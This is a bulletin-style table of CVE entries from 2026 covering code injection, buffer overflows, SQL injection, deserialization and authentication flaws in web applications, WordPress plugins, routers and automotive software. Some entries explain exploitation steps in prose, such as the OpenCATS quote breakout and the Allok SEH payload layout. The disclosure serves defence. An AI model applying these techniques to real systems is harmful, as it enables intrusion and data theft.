| opencats--OpenCATS | OpenCATS prior to commit 3002a29 contains a PHP code injection vulnerability in the installer AJAX endpoint that allows unauthenticated attackers to execute arbitrary code by injecting PHP statements into the databaseConnectivity action parameter. Attackers can break out of the define() string context in config.php using a single quote and statement separator to inject malicious PHP code that persists and executes on every subsequent page load when the installation wizard remains incomplete. | 2026-04-28 | 8.1 | CVE-2026-27760 | https://chocapikk.com/posts/2026/opencats-installer-rce/ https://github.com/opencats/OpenCATS/pull/706 https://github.com/opencats/OpenCATS/commit/3002a29f4c3cada1aa2c4f3d4ae4e189906606b6 https://github.com/opencats/OpenCATS/blob/46e4727/lib/CATSUtility.php#L142-L172 https://github.com/opencats/OpenCATS/blob/46e4727/modules/install/ajax/ui.php#L130 https://www.vulncheck.com/advisories/opencats-php-code-injection-via-installer-ajax-endpoint |
| Milesight--MS-Cxx63-PD | Specific firmware versions of Milesight AIOT camera firmware contain hard-coded credentials. | 2026-04-27 | 8.8 | CVE-2026-27785 | https://www.cisa.gov/news-events/ics-advisories/icsa-26-113-03 https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2026/icsa-26-113-03.json https://www.milesight.com/support/download/firmware |
| Cockpit--Cockpit CMS | Cockpit CMS contains an authenticated remote code execution vulnerability in the /cockpit/collections/save_collection endpoint that allows authenticated attackers with collection management privileges to inject arbitrary PHP code into collection rules parameters. Attackers can inject malicious PHP code through rule parameters which is written directly to server-side PHP files and executed via include() to achieve arbitrary command execution on the underlying server. | 2026-04-29 | 8.8 | CVE-2026-34965 | https://github.com/agentejo/cockpit https://gist.github.com/thepiyushkumarshukla/64d2318518b17f529bc3ccb11fd5be90 https://github.com/agentejo/cockpit/commits/494765e4f0fb9484f320aee0c6ee889b6fa789b9 https://www.vulncheck.com/advisories/cockpit-cms-authenticated-remote-code-execution-via-collections |
| n/a--(UDS) & OBD-II (On Board Diagnostics for Vehicles) | miaofng/uds-c commit e506334e270d77b20c0bc259ac6c7d8c9b702b7a (2016-10-05) contains a stack buffer overflow in send_diagnostic_request. A 6-byte stack buffer (MAX_DIAGNOSTIC_PAYLOAD_SIZE=6) receives memcpy at offset 1+pid_length with payload_length bytes. MAX_UDS_REQUEST_PAYLOAD_LENGTH=7, so 1+2+7=10 exceeds buffer by 4 bytes. No bounds check on payload_length before memcpy. | 2026-05-01 | 8.8 | CVE-2026-37536 | https://github.com/miaofng/uds-c https://github.com/openxc/uds-c https://gist.github.com/sgInnora/f4ac66faeefe07a653ceeb3f58cdc381 |
| n/a--Open-SAE-J1939 (Daniel Martensson) | collin80/Open-SAE-J1939 thru commit 744024d4306bc387857dfce439558336806acb06 (2023-03-08) contains an integer underflow leading to out-of-bounds write in Transport Protocol Data Transfer handling. At line 23: uint8_t index = data[0] - 1. When data[0] (sequence number from CAN frame) is 0, index underflows to 255. Subsequent write at tp_dt->data[255*7 + i-1] reaches offset 1791, exceeding the MAX_TP_DT buffer (1785 bytes) by 6 bytes. | 2026-05-01 | 8.1 | CVE-2026-37537 | https://github.com/DanielMartensson/Open-SAE-J1939 https://github.com/collin80/Open-SAE-J1939 https://gist.github.com/sgInnora/f4ac66faeefe07a653ceeb3f58cdc381 |
| openampproject[.]org--OpenAMP v2025.10.0 | OpenAMP v2025.10.0 ELF loader contains an integer overflow vulnerability in firmware image parsing. In elf_loader.c, it performs multiplication of two attacker-controlled 16-bit values from the ELF header without overflow checking. On 32-bit embedded systems (STM32MP1, Zynq, i.MX), large values can cause the product to wrap around to a small value. | 2026-05-01 | 8.4 | CVE-2026-37540 | https://github.com/OpenAMP/open-amp https://github.com/OpenAMP/open-amp/blob/main/lib/remoteproc/elf_loader.c https://gist.github.com/sgInnora/f4ac66faeefe07a653ceeb3f58cdc381 |
| n/a--MixPHP Framework 2.x | Unsafe deserialization vulnerability in MixPHP Framework 2.x thru 2.2.17. The sync-invoke TCP server (Server.php:87) receives data from a TCP socket, passes it directly to Opis\Closure\unserialize(), then executes the result via call_user_func(). No authentication or signature verification exists on the TCP connection. An attacker with access to the localhost TCP port (server binds 127.0.0.1) can send a crafted serialized PHP closure to achieve arbitrary code execution. | 2026-05-01 | 8.4 | CVE-2026-37552 | https://github.com/mix-php/mix https://github.com/mix-php/mix/blob/v2.2.17/src/sync-invoke/src/Server.php https://gist.github.com/sgInnora/fa46386840fe978a30d7e53c458f2975 |
| benjaminprojas--WP Editor | The WP Editor plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.2.9.2. This is due to missing nonce verification in the 'add_plugins_page' and 'add_themes_page' functions. This makes it possible for unauthenticated attackers to overwrite arbitrary plugin and theme PHP files with attacker-controlled code via a forged request, granted they can trick a site administrator into performing an action such as clicking a link. | 2026-05-01 | 8.8 | CVE-2026-3772 | https://www.wordfence.com/threat-intel/vulnerabilities/id/b1bc4a87-d5de-4d66-9cc5-802ef11f886c?source=cve https://plugins.trac.wordpress.org/browser/wp-editor/trunk/classes/WPEditorPlugins.php#L60 https://plugins.trac.wordpress.org/browser/wp-editor/trunk/classes/WPEditorThemes.php#L103 https://plugins.trac.wordpress.org/changeset/3480577/ |
| chartbrew--chartbrew | Chartbrew is an open-source web application that can connect directly to databases and APIs and use the data to create charts. In version 4.9.0, Chartbrew allows authenticated users with access to one project to update or delete a SharePolicy record that belongs to a different project. The affected routes authorize the caller against the project in the URL path, but they never verify that policy_id belongs to that project. This permits cross-project modification of dashboard sharing rules, including visibility, password requirements, allowed parameters, and expiration settings. This issue has been patched in version 5.0.0. | 2026-04-30 | 8.1 | CVE-2026-40600 | https://github.com/chartbrew/chartbrew/security/advisories/GHSA-pq8h-2h99-39xm https://github.com/chartbrew/chartbrew/releases/tag/v5.0.0 |
| TRENDnet--TEW-821DAP | A security vulnerability has been detected in TRENDnet TEW-821DAP 1.12B01. Impacted is the function auto_update_firmware of the component Firmware Udpate. The manipulation of the argument str leads to buffer overflow. The attack may be initiated remotely. The vendor explains: "That firmware version will only work on our hardware version v1.xR. We have already EOL that product 8 years ago and are no longer selling". This vulnerability only affects products that are no longer supported by the maintainer. | 2026-05-02 | 8.8 | CVE-2026-7607 | VDB-360564 | TRENDnet TEW-821DAP Firmware Udpate auto_update_firmware buffer overflow VDB-360564 | CTI Indicators (IOB, IOC, IOA) Submit #806214 | Trendnet TEW-821DAP v1.12B01 CWE-120 Buffer Copy without Checking Size of Input https://github.com/IOTRes/IOT_Firmware_Update/blob/main/Trendnet/TEW-821DAP_BO.md |
| carazo--Import and export users and customers | The Import and export users and customers plugin for WordPress is vulnerable to Privilege Escalation in all versions up to and including 2.0.8 via the `save_extra_user_profile_fields()` function. This is due to an incomplete blocklist that correctly restricts capability meta keys for the primary site (e.g., `wp_capabilities`, `wp_user_level`) but fails to block the equivalent meta keys for any other subsite in a WordPress Multisite network (e.g., `wp_2_capabilities`, `wp_2_user_level`), allowing these keys to pass the `in_array()` check and be written directly to user meta via `update_user_meta()`. This makes it possible for authenticated attackers, with Subscriber-level access and above, to escalate their privileges to Administrator on any subsite within the Multisite network by submitting a crafted profile update to `/wp-admin/profile.php`. Exploitation requires that an administrator has previously imported a CSV file containing multisite-prefixed capability column headers and has enabled the 'Show fields in profile?' option, which causes those keys to be stored in the `acui_columns` option and exposed as editable fields on the user profile page. | 2026-05-02 | 8.8 | CVE-2026-7641 | https://www.wordfence.com/threat-intel/vulnerabilities/id/368cff00-6a86-443e-aec4-4115a229a3c1?source=cve https://plugins.trac.wordpress.org/browser/import-users-from-csv-with-meta/trunk/classes/columns.php#L221 https://plugins.trac.wordpress.org/browser/import-users-from-csv-with-meta/tags/2.0.8/classes/columns.php#L221 https://plugins.trac.wordpress.org/browser/import-users-from-csv-with-meta/trunk/classes/columns.php#L198 https://plugins.trac.wordpress.org/browser/import-users-from-csv-with-meta/tags/2.0.8/classes/columns.php#L198 https://plugins.trac.wordpress.org/browser/import-users-from-csv-with-meta/trunk/classes/helper.php#L150 https://plugins.trac.wordpress.org/browser/import-users-from-csv-with-meta/tags/2.0.8/classes/helper.php#L150 https://plugins.trac.wordpress.org/browser/import-users-from-csv-with-meta/trunk/classes/multisite.php#L21 https://plugins.trac.wordpress.org/browser/import-users-from-csv-with-meta/tags/2.0.8/classes/multisite.php#L21 https://plugins.trac.wordpress.org/browser/import-users-from-csv-with-meta/tags/2.0.6/classes/columns.php#L221 https://plugins.trac.wordpress.org/browser/import-users-from-csv-with-meta/tags/2.0.6/classes/columns.php#L198 https://plugins.trac.wordpress.org/browser/import-users-from-csv-with-meta/tags/2.0.6/classes/helper.php#L150 https://plugins.trac.wordpress.org/browser/import-users-from-csv-with-meta/tags/2.0.6/classes/multisite.php#L21 https://plugins.trac.wordpress.org/changeset/3515646 |
| Cozmoslabs--Profile Builder Pro | The Profile Builder Pro plugin for WordPress is vulnerable to PHP Object Injection in all versions up to and including 3.14.5. This is due to the use of PHP's maybe_unserialize() function on the attacker-controlled 'args' POST parameter within the wppb_request_users_pins_action_callback() AJAX handler, which lacked any nonce verification, type checking, or input validation before deserialization. Because the handler was registered with both wp_ajax_ and wp_ajax_nopriv_ hooks, it was reachable by completely unauthenticated users. This makes it possible for unauthenticated attackers to inject arbitrary PHP objects into application memory. | 2026-05-02 | 8.1 | CVE-2026-7647 | https://www.wordfence.com/threat-intel/vulnerabilities/id/c7b897f5-f988-4515-83bc-456f041d7e2e?source=cve https://plugins.trac.wordpress.org/browser/profile-builder-pro/trunk/add-ons/user-listing/one-map-listing.php#L271 https://plugins.trac.wordpress.org/browser/profile-builder-pro/tags/3.14.5/add-ons/user-listing/one-map-listing.php#L271 https://plugins.trac.wordpress.org/browser/profile-builder-pro/trunk/add-ons/user-listing/one-map-listing.php#L13 https://plugins.trac.wordpress.org/browser/profile-builder-pro/tags/3.14.5/add-ons/user-listing/one-map-listing.php#L13 |
| Shenzhen Libituo Technology--LBT-T300-HW1 | A flaw has been found in Shenzhen Libituo Technology LBT-T300-HW1 up to 1.2.8. This issue affects the function start_single_service of the component Web Management Interface. Executing a manipulation of the argument vpn_pptp_server/vpn_l2tp_server can lead to buffer overflow. The attack can be executed remotely. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-03 | 8.8 | CVE-2026-7674 | VDB-360827 | Shenzhen Libituo Technology LBT-T300-HW1 Web Management start_single_service buffer overflow VDB-360827 | CTI Indicators (IOB, IOC, IOA) Submit #800705 | Libtor Technology lbt-t300-hw1 <=V1.2.8 Buffer Overflow Submit #800706 | Libtor Technology lbt-t300-hw1 <=V1.2.8 Buffer Overflow (Duplicate) https://github.com/hmKunlun/lbt-t300-hw1/blob/main/reselov_vpn_server%EF%BC%88vpn_pptp_server%EF%BC%89.md |
| Shenzhen Libituo Technology--LBT-T300-HW1 | A vulnerability has been found in Shenzhen Libituo Technology LBT-T300-HW1 up to 1.2.8. Impacted is the function start_lan of the file /apply.cgi. The manipulation of the argument Channel/ApCliSsid leads to buffer overflow. The attack is possible to be carried out remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-03 | 8.8 | CVE-2026-7675 | VDB-360828 | Shenzhen Libituo Technology LBT-T300-HW1 apply.cgi start_lan buffer overflow VDB-360828 | CTI Indicators (IOB, IOC, IOA) Submit #800708 | Libtor Technology lbt-t300-hw1 <=V1.2.8 Buffer Overflow Submit #800709 | Libtor Technology <=V1.2.8 Buffer Overflow (Duplicate) https://github.com/hmKunlun/lbt-t300-hw1/blob/main/generate_conf_router(Channel).md |
| Edimax--BR-6428nC | A security vulnerability has been detected in Edimax BR-6428nC up to 1.16. This impacts an unknown function of the file /goform/setWAN. Such manipulation of the argument pptpDfGateway leads to buffer overflow. The attack can be launched remotely. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-03 | 8.8 | CVE-2026-7684 | VDB-360843 | Edimax BR-6428nC setWAN buffer overflow VDB-360843 | CTI Indicators (IOB, IOC, IOA) Submit #801599 | Edimax BR-6428nC v1.16 Buffer Overflow https://tzh00203.notion.site/Edimax-BR-6428nC-v1-16-setWAN-pptpDfGateway-Stack-Overflow-33db5c52018a80c1835dd4fab4b6c7f2 |
| Edimax--BR-6208AC | A vulnerability was detected in Edimax BR-6208AC up to 1.02. Affected is an unknown function of the file /goform/setWAN. Performing a manipulation of the argument pptpDfGateway results in buffer overflow. The attack may be initiated remotely. The exploit is now public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-03 | 8.8 | CVE-2026-7685 | VDB-360844 | Edimax BR-6208AC setWAN buffer overflow VDB-360844 | CTI Indicators (IOB, IOC, IOA) Submit #801606 | Edimax BR-6208AC V2_1.02 Buffer Overflow https://tzh00203.notion.site/Edimax-BR-6428nC-v1-16-setWAN-pptpDfGateway-Stack-Overflow-33db5c52018a80c1835dd4fab4b6c7f2 |
| Alloksoft--Allok AVI to DVD SVCD VCD Converter | Allok AVI to DVD SVCD VCD Converter 4.0.1217 contains a structured exception handling (SEH) based buffer overflow vulnerability that allows local attackers to execute arbitrary code by supplying a malicious string in the License Name field. Attackers can craft a payload with junk data, NSEH bypass, SEH handler address, and shellcode that triggers the overflow when pasted into the License Name field and the Register button is clicked, resulting in code execution. | 2026-04-29 | 7.8 | CVE-2018-25302 | ExploitDB-44549 Official Product Homepage VulnCheck Advisory: Allok AVI to DVD SVCD VCD Converter 4.0.1217 Buffer Overflow SEH |
| mybb--MyBB Recent threads | MyBB Recent threads 17.0 contains a persistent cross-site scripting vulnerability that allows attackers to inject malicious scripts by creating threads with crafted subject lines. Attackers can create threads with script tags in the subject parameter to execute arbitrary JavaScript in the browsers of all users viewing the index page. | 2026-04-29 | 7.2 | CVE-2018-25309 | ExploitDB-44420 Product Reference VulnCheck Advisory: MyBB Recent threads 17.0 Persistent Cross-Site Scripting |
| Weaver Network Co., Ltd.--E-cology | Weaver (Fanwei) E-cology 9.5 versions prior to 10.52 contain an arbitrary file read vulnerability in the XmlRpcServlet interface at the XML-RPC endpoint that allows unauthenticated remote attackers to read arbitrary files by supplying file paths to the WorkflowService.getAttachment and WorkflowService.LoadTemplateProp methods. Attackers can exploit these methods without authentication to retrieve sensitive files including system configuration files and database credentials from the server. Exploitation evidence was first observed by the Shadowserver Foundation on 2022-12-14 (UTC). | 2026-04-30 | 7.5 | CVE-2022-50992 | https://www.weaver.com.cn/cs/securityDownload.html# https://www.weaver.com.cn/cs/ecology_full_log.html https://www.cnvd.org.cn/flaw/show/CNVD-2022-43245 https://blog.csdn.net/qq_36618918/article/details/135104295 https://blog.csdn.net/xiayu729100940/article/details/135205082 https://www.vulncheck.com/advisories/weaver-e-cology-unauthenticated-arbitrary-file-read-via-xmlrpcservlet |
| n/a--django-mdeditor | All versions of the package django-mdeditor are vulnerable to Missing Authentication for Critical Function in the image upload endpoint. An attacker can upload malicious files and achieve arbitrary code execution since this endpoint lacks authentication protection and proper sanitisation of file names. | 2026-04-30 | 7.1 | CVE-2025-13030 | https://security.snyk.io/vuln/SNYK-PYTHON-DJANGOMDEDITOR-8630926 https://github.com/pylixm/django-mdeditor/blob/e8dd73fb8571ddff2e7a20a4bfa88c376cc33b62/mdeditor/views.py%23L25 https://github.com/pylixm/django-mdeditor/issues/151 https://github.com/pylixm/django-mdeditor/pull/185 https://github.com/pylixm/django-mdeditor/commit/3e80f9edcabc5d2fc136b05a501964b8a5e97cfe |
| CryptPad--CryptPad | CryptPad 2025.3.1 allows unbounded WebSocket frame flood. A remote, unauthenticated attacker can significantly degrade or deny service for all users of a CryptPad instance. Fixed in 2026.2.2. | 2026-04-30 | 7.5 | CVE-2025-51846 | url url url url |
| Zyxel--DX3301-T0 firmware | A post-authentication command injection vulnerability in the "DomainName" parameter of the DHCP configuration file in Zyxel DX3301-T0 and EX3301-T0 firmware versions through 5.50(ABVY.7.1)C0 could allow an authenticated attacker with administrator privileges to execute OS commands on an affected device. | 2026-04-28 | 7.2 | CVE-2026-1460 | https://www.zyxel.com/global/en/support/security-advisories/zyxel-security-advisory-for-command-injection-vulnerabilities-in-certain-4g-lte-5g-nr-cpe-dsl-ethernet-cpe-fiber-onts-and-wireless-extenders-04-28-2026 |
| OPPO--ColorOS Assistant | ColorOS Assistant has an unauthenticated start-download channel, leading to file path traversal. | 2026-04-30 | 7.1 | CVE-2026-22070 | https://security.oppo.com/en/noticeDetail?notice_only_key=NOTICE-2049764240746881024 |
| VEGA Grieshaber--VEGAPULS 6X Two-wire PROFINET, Modbus TCP, OPC UA (Ethernet-APL) | An unsecured configuration interface on affected devices allows unauthenticated remote attackers to access sensitive information, including hashed credentials and access codes. | 2026-04-28 | 7.5 | CVE-2026-3323 | https://certvde.com/en/advisories/VDE-2026-016 https://vega.csaf-tp.certvde.com/.well-known/csaf/white/2026/vde-2026-016.json |
| redhat[.]com--DTLS | A flaw in GnuTLS DTLS handshake parsing allows malformed fragments with zero length and non-zero offset, leading to an integer underflow during reassembly and resulting in an out-of-bounds read. This issue is remotely exploitable and may cause information disclosure or denial of service. | 2026-04-30 | 7.5 | CVE-2026-33845 | RHSA-2026:13274 https://access.redhat.com/security/cve/CVE-2026-33845 RHBZ#2450624 |
| Dell--iDRAC10 | Dell iDRAC10, versions 1.20.70.50 and 1.30.05.10, contains an Insufficiently Protected Credentials vulnerability. A race condition vulnerability exists that could allow an authenticated low‑privileged attacker to gain elevated access. | 2026-04-29 | 7.1 | CVE-2026-35155 | https://www.dell.com/support/kbdoc/en-us/000452298/dsa-2026-187-security-update-for-dell-idrac10-vulnerability |
| n/a--Automotive Grade Linux (AGL) afb-daemon v19.90.0 | AGL app-framework-binder (afb-daemon) through v19.90.0 contains a privilege escalation vulnerability in the supervision Do command. The on_supervision_call function in src/afb-supervision.c explicitly nullifies the request credentials by calling afb_context_change_cred(&xreq->context, NULL) before dispatching an attacker-controlled API call via xapi->itf->call(xapi->closure, xreq). The NULL propagation chain through afb-context.c:110 (context->credentials = afb_cred_addref(NULL)) and afb-cred.c:163 (returns NULL when cred is NULL) confirms that credentials are zeroed before the target API executes. The attacker controls both api and verb parameters via JSON input, allowing execution of any registered API with a NULL credential context. APIs that rely on context->credentials for authorization decisions may fail open when receiving NULL credentials, enabling privilege escalation. This vulnerability was introduced in commit abbb4599f0b921c6f434b6bd02bcfb277eecf745 on 2018-02-14. | 2026-05-01 | 7.8 | CVE-2026-37525 | https://gerrit.automotivelinux.org/gerrit/src/app-framework-binder https://gist.github.com/sgInnora/8526eedcfd826d05ef1fc45d8f405643 |
| n/a--Automotive Grade Linux (AGL) afb-daemon v19.90.0 | AGL app-framework-binder (afb-daemon) through v19.90.0 allows any local process to execute privileged supervision commands (Exit, Do, Sclose, Config, Trace, Debug, Token, slist) without authentication via the abstract Unix socket @urn:AGL:afs:supervision:socket. The on_supervision_call function in src/afb-supervision.c dispatches all 8 commands without any credential verification. The abstract socket has no DAC protection, as acknowledged in the official CAUTION comment in src/afs-supervision.h. This allows a low-privileged local process to kill the daemon (DoS via Exit command), execute arbitrary API calls (via Do command), close arbitrary user sessions (via Sclose command), or leak the entire global configuration (via Config command). The vulnerability was introduced in commit b8c9d5de384efcfa53ebdb3f0053d7b3723777e1 on 2017-06-29. | 2026-05-01 | 7.8 | CVE-2026-37526 | https://gerrit.automotivelinux.org/gerrit/src/app-framework-binder https://gist.github.com/sgInnora/8526eedcfd826d05ef1fc45d8f405643 |
| n/a--Automotive Grade Linux (AGL) aglservice v17.1.12 | AGL agl-service-can-low-level thru 17.1.12 contains a heap buffer over-read in the isotp-c library. In isotp_continue_receive (receive.c:87-89), the payload_length for a Single Frame is extracted from a 4-bit nibble in the CAN frame data, yielding values 0-15. However, a standard CAN frame is only 8 bytes, with payload starting at data[1] (7 bytes available). When payload_length exceeds the available data (e.g., nibble=15 but only 7 payload bytes exist), memcpy(message.payload, &data[1], payload_length) reads up to 8 bytes past the end of the data buffer. | 2026-05-01 | 7.1 | CVE-2026-37532 | https://gerrit.automotivelinux.org/gerrit/apps/agl-service-can-low-level https://gist.github.com/sgInnora/8526eedcfd826d05ef1fc45d8f405643 |
| n/a--Automotive Grade Linux (AGL) isotp-c | openxc/isotp-c thru commit 5a5d19245f65189202719321facd49ce6f5d46ac (2021-08-09) contains an out-of-bounds read in the ISO-TP Single Frame receive handler, where the 4-bit payload length nibble is used directly as the memcpy size without validating it against the actual CAN data length. A malicious CAN frame with an oversized length nibble can cause memory reads beyond the buffer, allowing attackers to cause a denial of service, or gain sensitive information. | 2026-05-01 | 7.1 | CVE-2026-37535 | https://github.com/openxc/isotp-c https://github.com/openxc/isotp-c/blob/master/src/isotp/receive.c https://gist.github.com/sgInnora/f4ac66faeefe07a653ceeb3f58cdc381 |
| n/a-- Vanetza V2X v26.02 | An issue was discovered in Vanetza V2X v26.02 allowing remote unauthorized attackers to cause a denial of service. The vulnerability exists in the GeoNetworking packet processing pipeline where OpenSSL exceptions from ECC point validation (invalid compressed point, point not on curve) are not properly caught by the Router::indicate() call chain. The openssl_wrapper.cpp check() function (line 19) throws openssl::Exception when OpenSSL operations fail. The parser's catch block in parse_secured() should catch these, but the exception escapes through subsequent processing stages (indicate_common, indicate_extended). This causes std::terminate, crashing the V2X receiver. | 2026-05-01 | 7.5 | CVE-2026-37554 | https://github.com/riebl/vanetza https://github.com/riebl/vanetza/blob/master/vanetza/security/openssl_wrapper.cpp https://github.com/riebl/vanetza/blob/master/vanetza/geonet/router.cpp https://gist.github.com/sgInnora/45128ae15d52df7238680a8f2da8359f |
| chartbrew--chartbrew | Chartbrew is an open-source web application that can connect directly to databases and APIs and use the data to create charts. In version 4.9.0, Chartbrew exposes public chart retrieval and export routes that only verify project-level public access and, for exports, a team-level export toggle. The routes do not verify whether the target chart is actually allowed on the public report or whether the governing SharePolicy permits public access. An unauthenticated attacker who knows a chart identifier in a public project can read or export chart data for charts that were intentionally hidden from the report. This issue has been patched in version 5.0.0. | 2026-04-30 | 7.5 | CVE-2026-40595 | https://github.com/chartbrew/chartbrew/security/advisories/GHSA-mq7q-6xh6-5649 https://github.com/chartbrew/chartbrew/releases/tag/v5.0.0 |
| cyberhobo--Geo Mashup | The Geo Mashup plugin for WordPress is vulnerable to Time-Based SQL Injection via the 'sort' parameter in all versions up to, and including, 1.13.18. This is due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. The `esc_sql()` function is applied but is ineffective in the `ORDER BY` context because the value is not enclosed in quotes. Additionally, while a `sanitize_sort_arg()` allowlist-based sanitizer was added in version 1.13.18, it is only applied in the AJAX code path (`sanitize_query_args()`) and not in the `render-map.php` or template tag code paths. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database via a time-based blind approach. | 2026-05-02 | 7.5 | CVE-2026-4060 | https://www.wordfence.com/threat-intel/vulnerabilities/id/2fa5ae9a-532c-40f9-b70a-217f0f9cd473?source=cve https://plugins.trac.wordpress.org/browser/geo-mashup/trunk/geo-mashup-db.php#L1767 https://plugins.trac.wordpress.org/browser/geo-mashup/trunk/geo-mashup-db.php#L1785 https://plugins.trac.wordpress.org/browser/geo-mashup/trunk/render-map.php#L166 https://plugins.trac.wordpress.org/changeset/3503627/ |
| chartbrew--chartbrew | Chartbrew is an open-source web application that can connect directly to databases and APIs and use the data to create charts. In version 4.9.0, Chartbrew exposes POST /api/chart/:chart_id/query without authentication. The endpoint only checks team.allowReportRefresh and does not verify that the target chart belongs to a public report, that the project is public, or that sharing policy allows the operation. An unauthenticated attacker who knows a chart identifier can trigger a data refresh and retrieve the current data of private charts. This issue has been patched in version 5.0.0. | 2026-04-30 | 7.5 | CVE-2026-40601 | https://github.com/chartbrew/chartbrew/security/advisories/GHSA-cpr6-mhgm-893w https://github.com/chartbrew/chartbrew/releases/tag/v5.0.0 |
| cyberhobo--Geo Mashup | The Geo Mashup plugin for WordPress is vulnerable to Time-Based SQL Injection via the 'map_post_type' parameter in all versions up to, and including, 1.13.18. This is due to the `SearchResults` hook explicitly calling `stripslashes_deep($_POST)` which removes WordPress magic quotes protection, followed by the unsanitized `map_post_type` value being concatenated into an `IN(...)` clause without `esc_sql()` or `$wpdb->prepare()`. The 'any' branch of the same code correctly applies `array_map('esc_sql', ...)`, but the else branch does not. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database via a time-based blind approach. Exploitation requires the Geo Search feature to be enabled in plugin settings. | 2026-05-02 | 7.5 | CVE-2026-4061 | https://www.wordfence.com/threat-intel/vulnerabilities/id/cc3cf6c5-643e-49ca-b09c-bd7cfec328ee?source=cve https://plugins.trac.wordpress.org/browser/geo-mashup/trunk/geo-mashup-db.php#L1748 https://plugins.trac.wordpress.org/browser/geo-mashup/trunk/php/Hooks/SearchResults.php#L39 https://plugins.trac.wordpress.org/browser/geo-mashup/trunk/php/Search.php#L152 https://plugins.trac.wordpress.org/changeset/3503627/ |
| cyberhobo--Geo Mashup | The Geo Mashup plugin for WordPress is vulnerable to Time-Based SQL Injection via the 'object_ids' and 'exclude_object_ids' parameters in all versions up to, and including, 1.13.18. This is due to insufficient escaping on the user supplied parameters and lack of sufficient preparation on the existing SQL query. The `esc_sql()` function is applied but is ineffective because the values are placed in an unquoted `IN(...)` / `NOT IN(...)` SQL context - `esc_sql()` only escapes quote characters and provides no protection against parenthesis or SQL keyword injection. Additionally, while a numeric-only sanitizer exists in `sanitize_query_args()`, it is only applied in the AJAX code path and not in the `render-map.php` or template tag code paths. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database via a time-based blind approach. | 2026-05-02 | 7.5 | CVE-2026-4062 | https://www.wordfence.com/threat-intel/vulnerabilities/id/abc5ed0a-504f-4d8c-9662-a4c9f7c7acb8?source=cve https://plugins.trac.wordpress.org/browser/geo-mashup/trunk/geo-mashup-db.php#L1755 https://plugins.trac.wordpress.org/browser/geo-mashup/trunk/geo-mashup-db.php#L1759 https://plugins.trac.wordpress.org/browser/geo-mashup/trunk/render-map.php#L166 https://plugins.trac.wordpress.org/changeset/3503627/ |
| n/a--libssh2 | A security vulnerability has been detected in libssh2 up to 1.11.1. The impacted element is the function userauth_password of the file src/userauth.c. Such manipulation of the argument username_len/password_len leads to integer overflow. The attack may be launched remotely. The name of the patch is 256d04b60d80bf1190e96b0ad1e91b2174d744b1. A patch should be applied to remediate this issue. | 2026-05-01 | 7.3 | CVE-2026-7598 | VDB-360555 | libssh2 userauth.c userauth_password integer overflow VDB-360555 | CTI Indicators (IOB, IOC, IOA) Submit #805564 | libssh2 <= 1.11.1 Integer Overflow https://github.com/libssh2/libssh2/pull/1858 https://github.com/libssh2/libssh2/commit/256d04b60d80bf1190e96b0ad1e91b2174d744b1 https://github.com/libssh2/libssh2/ |
| innocommerce--InnoShop | A vulnerability has been found in innocommerce InnoShop up to 0.7.8. The affected element is the function InstallServiceProvider::boot of the file innopacks/install/src/InstallServiceProvider.php of the component Installation Endpoint. The manipulation leads to improper authentication. Remote exploitation of the attack is possible. The exploit has been disclosed to the public and may be used. The identifier of the patch is 45758e4ec22451ab944ae2ae826b1e70f6450dc9. It is recommended to apply a patch to fix this issue. | 2026-05-02 | 7.3 | CVE-2026-7630 | VDB-360576 | innocommerce InnoShop Installation Endpoint InstallServiceProvider.php boot improper authentication VDB-360576 | CTI Indicators (IOB, IOC, IOA) Submit #806484 | innocommerce innoshop <= 0.7.3 Missing Authorization https://github.com/innocommerce/innoshop/issues/314 https://github.com/innocommerce/innoshop/issues/314#issuecomment-4357464458 https://github.com/innocommerce/innoshop/commit/45758e4ec22451ab944ae2ae826b1e70f6450dc9 https://github.com/innocommerce/innoshop/ |
| code-projects--Online Hospital Management System | A vulnerability was determined in code-projects Online Hospital Management System 1.0. This affects an unknown function of the file /viewappointment.php. This manipulation of the argument delid causes sql injection. The attack is possible to be carried out remotely. The exploit has been publicly disclosed and may be utilized. | 2026-05-02 | 7.3 | CVE-2026-7632 | VDB-360578 | code-projects Online Hospital Management System viewappointment.php sql injection VDB-360578 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #806633 | code-projects Online Hospital Management System In PHP 1.0 SQL Injection https://github.com/Sh1tKing/cve/blob/main/time-blind-sql.md https://github.com/Sh1tKing/cve/blob/main/CVE-2026-7632.md https://code-projects.org/ |
| ChatGPTNextWeb--NextChat | A vulnerability has been found in ChatGPTNextWeb NextChat up to 2.16.1. Affected is the function addMcpServer of the file app/mcp/actions.ts. The manipulation leads to improper authorization. Remote exploitation of the attack is possible. The exploit has been disclosed to the public and may be used. The project was informed of the problem early through an issue report but has not responded yet. | 2026-05-02 | 7.3 | CVE-2026-7644 | VDB-360756 | ChatGPTNextWeb NextChat actions.ts addMcpServer improper authorization VDB-360756 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #806851 | ChatGPTNextWeb NextChat 2.16.1 Unauthenticated Remote Code Execution https://github.com/ChatGPTNextWeb/NextChat/issues/6757 https://github.com/ChatGPTNextWeb/NextChat/ |
| reputeinfosystems--ARMember Membership Plugin, Content Restriction, Member Levels, User Profile & User signup | The ARMember - Membership Plugin, Content Restriction, Member Levels, User Profile & User signup plugin for WordPress is vulnerable to time-based blind SQL Injection via the 'orderby' parameter in all versions up to, and including, 4.0.60 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. | 2026-05-02 | 7.5 | CVE-2026-7649 | https://www.wordfence.com/threat-intel/vulnerabilities/id/eb064156-f54b-4401-9d4f-29f0952deb24?source=cve https://plugins.trac.wordpress.org/browser/armember-membership/trunk/core/classes/class.arm_members_directory.php#L1019 https://plugins.trac.wordpress.org/browser/armember-membership/tags/4.0.60/core/classes/class.arm_members_directory.php#L1019 